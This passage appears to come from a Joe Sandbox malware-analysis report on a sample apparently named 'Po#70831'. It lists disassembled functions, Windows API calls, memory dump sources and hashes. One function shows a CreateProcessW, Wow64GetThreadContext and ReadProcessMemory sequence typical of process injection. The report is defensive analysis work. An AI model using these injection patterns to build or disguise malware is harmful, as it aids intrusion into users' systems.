                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      • Opcode ID: fd5b73fd4c861a0d01b1f954fb3353492775b34b5ffa494f2b0796c715dbdd09
                                      • Instruction ID: 2abb8e51ffbf7233c6c627163582d0448afa79414a06cecf797e60e879d6e8b1
                                      • Opcode Fuzzy Hash: fd5b73fd4c861a0d01b1f954fb3353492775b34b5ffa494f2b0796c715dbdd09
                                      • Instruction Fuzzy Hash: 0831B4706047008FD720EF65D8847A7BBE4FB5A309F00092FF59A83340D7B5AA48DB9A
                                      Function 036D129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 036D1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036D1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036D1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction ID: 198ee90009f83e592abb1a3f118c224371a1b8925aa3c081369476dde2ffed23
                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction Fuzzy Hash: 7112CE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4E81CF5A
                                      Function 00494ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00494E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E9C
                                        • Part of subcall function 00494E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00494EAE
                                        • Part of subcall function 00494E90: FreeLibrary.KERNEL32(00000000,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EC0
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EFD
                                        • Part of subcall function 00494E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E62
                                        • Part of subcall function 00494E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00494E74
                                        • Part of subcall function 00494E59: FreeLibrary.KERNEL32(00000000,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E87
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressFreeProc
                                      • String ID:
                                      • API String ID: 2632591731-0
                                      • Opcode ID: 88b226e44db64e448d72febdffac72a056a5f5d632e6253e0a37b3c15e76de4d
                                      • Instruction ID: d38565d65e442998003f71641a2bbf5862a04cad53193d8ae9060c6cfcfc119e
                                      • Opcode Fuzzy Hash: 88b226e44db64e448d72febdffac72a056a5f5d632e6253e0a37b3c15e76de4d
                                      • Instruction Fuzzy Hash: B5112B32610206AACF10AF61DC02FAD7FA4AF80B14F10843FF442A61C5EE789A069758
                                      Function 004C8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      • Opcode ID: 3996801806888d943f36abaff1f15922e13c000d755a95217682fa6059f7580a
                                      • Instruction ID: 2fe9e7870b9f7bccc8405994c92fb43739362e42112b03d57fa517e96d393099
                                      • Opcode Fuzzy Hash: 3996801806888d943f36abaff1f15922e13c000d755a95217682fa6059f7580a
                                      • Instruction Fuzzy Hash: 5B111C7590410AAFCB15DF58E941EAF7BF5EF48314F15405AF804AB311DA31DA11CB69
                                      Function 004C5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004C4C7D: RtlAllocateHeap.NTDLL(00000008,00491129,00000000,?,004C2E29,00000001,00000364,?,?,?,004BF2DE,004C3863,00561444,?,004AFDF5,?), ref: 004C4CBE
                                      • _free.LIBCMT ref: 004C506C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                      • Instruction ID: 03a6efde6e3da921f7a2512b469068e9cbdc91656bde744492756de227e115a8
                                      • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                      • Instruction Fuzzy Hash: 0F0126B62047046BE3218F669881F5EFBE8FB89370F25051EE58493280EA74A845C6B8
                                      Function 004BE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                      • Instruction ID: 96387c4c69966f6092345b9781629381d1a033d2d0c2b3203395e9ee2e46f1dc
                                      • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                      • Instruction Fuzzy Hash: 43F0F936511A149AC6313A678D05FDB37989FA2338F10075FF825922D2DBBC940285BE
                                      Function 00499CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID:
                                      • API String ID: 176396367-0
                                      • Opcode ID: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                      • Instruction ID: 056cc00717efc0a6977162bb5abef275d53fc001552bedbcd0695b2620078b61
                                      • Opcode Fuzzy Hash: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                      • Instruction Fuzzy Hash: 1CF0F4B22006006ED7249F29C802AA7BB94EB44760F10853FFA19CB1D1DB35E41486A8
                                      Function 004C4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00491129,00000000,?,004C2E29,00000001,00000364,?,?,?,004BF2DE,004C3863,00561444,?,004AFDF5,?), ref: 004C4CBE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 44488c2b55993ed6e0a18830421b5b79b66d8758db942d7ab298f5e5ad4f438f
                                      • Instruction ID: ff1f54547e02635f21395f53cb2bfa857ffeb24296a2328cccfff7a0c13e01c8
                                      • Opcode Fuzzy Hash: 44488c2b55993ed6e0a18830421b5b79b66d8758db942d7ab298f5e5ad4f438f
                                      • Instruction Fuzzy Hash: 9CF02B3960212066DB601F629E15F5B3748AFD13B0B06411FFC05973E1CB38D80151E8
                                      Function 004C3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: cc9cf68a5439afede0181c19754540935b2797a9df53131fff2e3ebcfef04314
                                      • Instruction ID: b9cc64ff08431c87632080541d8f99da3754f118219894ecb1ec0a45f6b891ef
                                      • Opcode Fuzzy Hash: cc9cf68a5439afede0181c19754540935b2797a9df53131fff2e3ebcfef04314
                                      • Instruction Fuzzy Hash: 74E0A03910422456E6613E679C01FAB36D8AB827B2B05802FB805926C1CB19DD0295FD
                                      Function 004C4D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 004C4D9C
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast_free
                                      • String ID:
                                      • API String ID: 1353095263-0
                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                      • Instruction ID: 5adcd4db172a95bbcc5f66dd95d65cc2a7950faeeee045080d9cb43cb33ed0c9
                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                      • Instruction Fuzzy Hash: 1EE0927A2003059F87A0DF6DD500A82B7F4EF84325720852EE89ED3310D331E812CB80
                                      Function 00494F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494F6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bfa6a5f2e11222d55d149c25fe0736e9d1097c441317fe262859802546e0212b
                                      • Instruction ID: 082054b0c189a3e52fef61c95441818a853ad4e99b7052b4481aef015260b567
                                      • Opcode Fuzzy Hash: bfa6a5f2e11222d55d149c25fe0736e9d1097c441317fe262859802546e0212b
                                      • Instruction Fuzzy Hash: E6F08570005302CFCB348F20D490C22BBE0AF943293208A7FE1EA82621C739984ADB18
                                      Function 00492DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00492DC4
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LongNamePath_wcslen
                                      • String ID:
                                      • API String ID: 541455249-0
                                      • Opcode ID: a0ae4d247acbace673d29f9db3706db273ed2ee86cdcfa9c309a4b5b136b72cf
                                      • Instruction ID: a8d0bc8b4dd24354d791598cafc6daaef51d58879c2216667a725935fdcb944f
                                      • Opcode Fuzzy Hash: a0ae4d247acbace673d29f9db3706db273ed2ee86cdcfa9c309a4b5b136b72cf
                                      • Instruction Fuzzy Hash: 74E0CD766001245BCB209399DC05FDA77DDDFC8794F050076FD09D7258D964AD848554
                                      Function 00502693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                      • Instruction ID: 627555fb68e07ed76298df8be05460e1d7a8e25ea73d8bc78ba1bd4218dc4716
                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                      • Instruction Fuzzy Hash: 8DE048B0609B005FDF395A28A8517F677D49F49300F10045EF59F83352E57378458A5D
                                      Function 00492B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00493837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00493908
                                        • Part of subcall function 0049D730: GetInputState.USER32 ref: 0049D807
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00492B6B
                                        • Part of subcall function 004930F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0049314E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                      • String ID:
                                      • API String ID: 3667716007-0
                                      • Opcode ID: 968434d5664ae1f4ea695216ce124a40236c26e0bd0593102b45152ca11022b6
                                      • Instruction ID: 2e4032457cc0383957ca104569a8b06a3669494405d534ebe809be8f69c5d129
                                      • Opcode Fuzzy Hash: 968434d5664ae1f4ea695216ce124a40236c26e0bd0593102b45152ca11022b6
                                      • Instruction Fuzzy Hash: E7E0862170424416CE08FF77985297DAF999FE235BF44193FF14683163DE6C4949425A
                                      Function 004D039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,00000000,?,004D0704,?,?,00000000,?,004D0704,00000000,0000000C), ref: 004D03B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 370dbd1fb616da8c54f6cfa2a345645e2bbfa08984b4dc31e192f022d95789a1
                                      • Instruction ID: 12e9e627dc02a9f0e88d7e3a6b6e8fdbba2f5a83cff4534098ce44b378e09bba
                                      • Opcode Fuzzy Hash: 370dbd1fb616da8c54f6cfa2a345645e2bbfa08984b4dc31e192f022d95789a1
                                      • Instruction Fuzzy Hash: 3ED06C3204010DBBDF128F84DD06EDA3FAAFB48714F014000BE1856021C732E832EB90
                                      Function 00491CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00491CBC
                                      Memory Dump Source
